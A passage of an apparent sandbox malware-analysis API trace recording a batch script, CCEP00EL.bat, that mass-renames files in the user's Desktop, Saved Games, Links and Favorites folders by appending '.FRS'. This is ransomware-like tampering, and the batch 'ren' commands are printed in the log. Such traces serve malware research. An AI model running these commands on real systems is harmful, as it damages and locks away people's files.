lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.188] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.188] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\RbzJ46DM.m4a" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\rbzj46dm.m4a"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\RbzJ46DM.m4a.FRS" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\rbzj46dm.m4a.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.188] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.188] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\rpGEfLLKSK.m4a" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\rpgefllksk.m4a"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\rpGEfLLKSK.m4a.FRS" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\rpgefllksk.m4a.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.189] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.189] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\uc2U5SGsnmjJE2.pps" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\uc2u5sgsnmjje2.pps"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\uc2U5SGsnmjJE2.pps.FRS" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\uc2u5sgsnmjje2.pps.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.189] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.189] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\V7aFohjMdiyo.m4a" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\v7afohjmdiyo.m4a"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\V7aFohjMdiyo.m4a.FRS" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\v7afohjmdiyo.m4a.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.189] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.189] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\w5 xAs-kUM9kX.odp" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\w5 xas-kum9kx.odp"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\w5 xAs-kUM9kX.odp.FRS" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\w5 xas-kum9kx.odp.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.190] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.190] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\wu_4n34gRXa-1P.swf" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\wu_4n34grxa-1p.swf"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\wu_4n34gRXa-1P.swf.FRS" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\wu_4n34grxa-1p.swf.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.190] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.190] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\wYeepEITvrXcPBjj6.m4a" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\wyeepeitvrxcpbjj6.m4a"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\wYeepEITvrXcPBjj6.m4a.FRS" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\wyeepeitvrxcpbjj6.m4a.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.190] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.190] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\x 0yrdzRhLK5vrlqSe.flv" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\x 0yrdzrhlk5vrlqse.flv"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\x 0yrdzRhLK5vrlqSe.flv.FRS" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\x 0yrdzrhlk5vrlqse.flv.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.191] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.191] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\xA1kQSkcf8G.rtf" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\xa1kqskcf8g.rtf"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\xA1kQSkcf8G.rtf.FRS" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\xa1kqskcf8g.rtf.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.191] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 0 [0035.191] GetLastError () returned 0x12 [0035.191] FindClose (in: hFindFile=0xd27338 | out: hFindFile=0xd27338) returned 1 [0035.191] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.191] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0035.193] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.193] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0035.194] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.194] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.194] SetConsoleInputExeNameW () returned 0x1 [0035.194] GetConsoleOutputCP () returned 0x1b5 [0035.194] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.194] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.194] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0035.194] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0035.194] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.194] SetFilePointer (in: hFile=0x94, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0035.195] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.195] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0035.195] ReadFile (in: hFile=0x94, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9aa, lpOverlapped=0x0) returned 1 [0035.195] SetFilePointer (in: hFile=0x94, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0035.195] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0035.195] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.195] GetFileType (hFile=0x94) returned 0x1 [0035.195] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.195] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0035.196] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="5JgHKoaOfdp") returned 0xb [0035.196] _wcsicmp (_String1="ren", _String2=")") returned 73 [0035.196] _wcsicmp (_String1="FOR", _String2="ren") returned -12 [0035.196] _wcsicmp (_String1="FOR/?", _String2="ren") returned -12 [0035.196] _wcsicmp (_String1="IF", _String2="ren") returned -9 [0035.196] _wcsicmp (_String1="IF/?", _String2="ren") returned -9 [0035.196] _wcsicmp (_String1="REM", _String2="ren") returned -1 [0035.196] _wcsicmp (_String1="REM/?", _String2="ren") returned -1 [0035.197] _tell (_FileHandle=3) returned 247 [0035.197] _close (_FileHandle=3) returned 0 [0035.197] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0035.197] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0035.197] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0035.197] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0035.197] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0035.197] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0035.197] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0035.197] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0035.197] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0035.197] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.197] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0035.197] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0035.197] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0035.197] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0035.197] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0035.197] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0035.197] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0035.197] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0035.197] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0035.197] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.197] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.197] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xc8eb68, nVolumeNameSize=0x104, lpVolumeSerialNumber=0xc8eb60, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xc8eb60*=0xba2ee5af, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0035.198] _wcsicmp (_String1="*.*", _String2=".") returned -4 [0035.198] _wcsicmp (_String1="*.*", _String2="..") returned -4 [0035.198] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Saved Games\\*.*" (normalized: "c:\\users\\5jghkoaofdp\\saved games\\*.*")) returned 0xffffffff [0035.198] GetLastError () returned 0x7b [0035.198] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd18248 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0035.198] SetErrorMode (uMode=0x0) returned 0x0 [0035.198] SetErrorMode (uMode=0x1) returned 0x0 [0035.198] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Saved Games\\*.*", nBufferLength=0x104, lpBuffer=0xc8e4f8, lpFilePart=0xc8e4cc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Saved Games\\*.*", lpFilePart=0xc8e4cc*="*.*") returned 0x24 [0035.198] SetErrorMode (uMode=0x0) returned 0x1 [0035.198] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Saved Games" (normalized: "c:\\users\\5jghkoaofdp\\saved games")) returned 0x11 [0035.198] _wcsicmp (_String1="*.*", _String2=".") returned -4 [0035.198] _wcsicmp (_String1="*.*", _String2="..") returned -4 [0035.198] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Saved Games\\*.*" (normalized: "c:\\users\\5jghkoaofdp\\saved games\\*.*")) returned 0xffffffff [0035.198] GetLastError () returned 0x7b [0035.198] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Saved Games\\*.*", fInfoLevelId=0x1, lpFindFileData=0xd17fe8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xd17fe8) returned 0xd27338 [0035.198] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe8 | out: lpFindFileData=0xd17fe8) returned 1 [0035.199] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe8 | out: lpFindFileData=0xd17fe8) returned 1 [0035.199] FindNextFileW (in: hFindFile=0xd27338, lpFindFileData=0xd17fe8 | out: lpFindFileData=0xd17fe8) returned 0 [0035.199] FindClose (in: hFindFile=0xd27338 | out: hFindFile=0xd27338) returned 1 [0035.199] GetLastError () returned 0x12 [0035.199] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Saved Games\\*.*", fInfoLevelId=0x1, lpFindFileData=0xd17fe8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xd17fe8) returned 0xd27338 [0035.199] FindClose (in: hFindFile=0xd27338 | out: hFindFile=0xd27338) returned 1 [0035.199] _get_osfhandle (_FileHandle=2) returned 0x2c [0035.199] GetFileType (hFile=0x2c) returned 0x2 [0035.199] GetStdHandle (nStdHandle=0xfffffff4) returned 0x2c [0035.199] GetConsoleMode (in: hConsoleHandle=0x2c, lpMode=0xc8e674 | out: lpMode=0xc8e674) returned 1 [0035.199] _get_osfhandle (_FileHandle=2) returned 0x2c [0035.199] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2c, lpConsoleScreenBufferInfo=0xc8e6c4 | out: lpConsoleScreenBufferInfo=0xc8e6c4) returned 1 [0035.200] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x232a, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The syntax of the command is incorrect.\r\n") returned 0x29 [0035.201] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x232a, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0xc8e6f4 | out: lpBuffer="The syntax of the command is incorrect.\r\n") returned 0x29 [0035.201] WriteConsoleW (in: hConsoleOutput=0x2c, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x29, lpNumberOfCharsWritten=0xc8e6a8, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0xc8e6a8*=0x29) returned 1 [0035.202] longjmp () [0035.202] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.202] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0035.202] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.202] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0035.202] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.202] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.202] SetConsoleInputExeNameW () returned 0x1 [0035.202] GetConsoleOutputCP () returned 0x1b5 [0035.203] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.203] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.203] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0035.203] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0035.203] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.203] SetFilePointer (in: hFile=0x94, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0035.203] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.203] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0035.203] ReadFile (in: hFile=0x94, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x977, lpOverlapped=0x0) returned 1 [0035.204] SetFilePointer (in: hFile=0x94, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0035.204] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\np.txt\"')do set n=%%i\r\n") returned 45 [0035.204] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.204] GetFileType (hFile=0x94) returned 0x1 [0035.204] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.204] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0035.204] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="5JgHKoaOfdp") returned 0xb [0035.205] _wcsicmp (_String1="ren", _String2=")") returned 73 [0035.205] _wcsicmp (_String1="FOR", _String2="ren") returned -12 [0035.205] _wcsicmp (_String1="FOR/?", _String2="ren") returned -12 [0035.205] _wcsicmp (_String1="IF", _String2="ren") returned -9 [0035.205] _wcsicmp (_String1="IF/?", _String2="ren") returned -9 [0035.205] _wcsicmp (_String1="REM", _String2="ren") returned -1 [0035.205] _wcsicmp (_String1="REM/?", _String2="ren") returned -1 [0035.205] _tell (_FileHandle=3) returned 292 [0035.205] _close (_FileHandle=3) returned 0 [0035.205] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0035.205] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0035.205] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0035.205] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0035.205] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0035.205] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0035.205] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0035.205] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0035.205] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0035.205] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.206] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0035.206] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0035.206] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0035.206] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0035.206] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0035.206] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0035.206] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0035.206] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0035.206] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0035.206] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.206] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.206] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xc8eb68, nVolumeNameSize=0x104, lpVolumeSerialNumber=0xc8eb60, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xc8eb60*=0xba2ee5af, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0035.206] _wcsicmp (_String1="*.*", _String2=".") returned -4 [0035.206] _wcsicmp (_String1="*.*", _String2="..") returned -4 [0035.206] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Links\\*.*" (normalized: "c:\\users\\5jghkoaofdp\\links\\*.*")) returned 0xffffffff [0035.206] GetLastError () returned 0x7b [0035.206] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd18240 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0035.206] SetErrorMode (uMode=0x0) returned 0x0 [0035.206] SetErrorMode (uMode=0x1) returned 0x0 [0035.207] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Links\\*.*", nBufferLength=0x104, lpBuffer=0xc8e4f8, lpFilePart=0xc8e4cc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Links\\*.*", lpFilePart=0xc8e4cc*="*.*") returned 0x1e [0035.207] SetErrorMode (uMode=0x0) returned 0x1 [0035.207] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Links" (normalized: "c:\\users\\5jghkoaofdp\\links")) returned 0x11 [0035.207] _wcsicmp (_String1="*.*", _String2=".") returned -4 [0035.207] _wcsicmp (_String1="*.*", _String2="..") returned -4 [0035.207] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Links\\*.*" (normalized: "c:\\users\\5jghkoaofdp\\links\\*.*")) returned 0xffffffff [0035.207] GetLastError () returned 0x7b [0035.207] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Links\\*.*", fInfoLevelId=0x1, lpFindFileData=0xd17fe0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xd17fe0) returned 0xd19008 [0035.207] FindNextFileW (in: hFindFile=0xd19008, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.207] FindNextFileW (in: hFindFile=0xd19008, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.207] FindNextFileW (in: hFindFile=0xd19008, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.207] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Links\\Desktop.lnk" (normalized: "c:\\users\\5jghkoaofdp\\links\\desktop.lnk"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Links\\Desktop.lnk.FRS" (normalized: "c:\\users\\5jghkoaofdp\\links\\desktop.lnk.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.209] FindNextFileW (in: hFindFile=0xd19008, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.209] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Links\\Downloads.lnk" (normalized: "c:\\users\\5jghkoaofdp\\links\\downloads.lnk"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Links\\Downloads.lnk.FRS" (normalized: "c:\\users\\5jghkoaofdp\\links\\downloads.lnk.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.210] FindNextFileW (in: hFindFile=0xd19008, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 1 [0035.210] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5jghkoaofdp\\links\\recentplaces.lnk"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Links\\RecentPlaces.lnk.FRS" (normalized: "c:\\users\\5jghkoaofdp\\links\\recentplaces.lnk.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.210] FindNextFileW (in: hFindFile=0xd19008, lpFindFileData=0xd17fe0 | out: lpFindFileData=0xd17fe0) returned 0 [0035.210] GetLastError () returned 0x12 [0035.210] FindClose (in: hFindFile=0xd19008 | out: hFindFile=0xd19008) returned 1 [0035.210] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.210] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0035.210] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.210] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0035.211] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.211] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.211] SetConsoleInputExeNameW () returned 0x1 [0035.211] GetConsoleOutputCP () returned 0x1b5 [0035.211] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.211] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.211] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0035.211] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0035.212] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.212] SetFilePointer (in: hFile=0x94, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0035.212] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.212] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0035.212] ReadFile (in: hFile=0x94, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x94a, lpOverlapped=0x0) returned 1 [0035.212] SetFilePointer (in: hFile=0x94, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0035.212] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\np.txt\"')do set n=%%i\r\n") returned 49 [0035.212] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.212] GetFileType (hFile=0x94) returned 0x1 [0035.212] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.212] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0035.212] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="5JgHKoaOfdp") returned 0xb [0035.213] _wcsicmp (_String1="ren", _String2=")") returned 73 [0035.213] _wcsicmp (_String1="FOR", _String2="ren") returned -12 [0035.213] _wcsicmp (_String1="FOR/?", _String2="ren") returned -12 [0035.213] _wcsicmp (_String1="IF", _String2="ren") returned -9 [0035.213] _wcsicmp (_String1="IF/?", _String2="ren") returned -9 [0035.213] _wcsicmp (_String1="REM", _String2="ren") returned -1 [0035.213] _wcsicmp (_String1="REM/?", _String2="ren") returned -1 [0035.213] _tell (_FileHandle=3) returned 341 [0035.213] _close (_FileHandle=3) returned 0 [0035.213] _wcsicmp 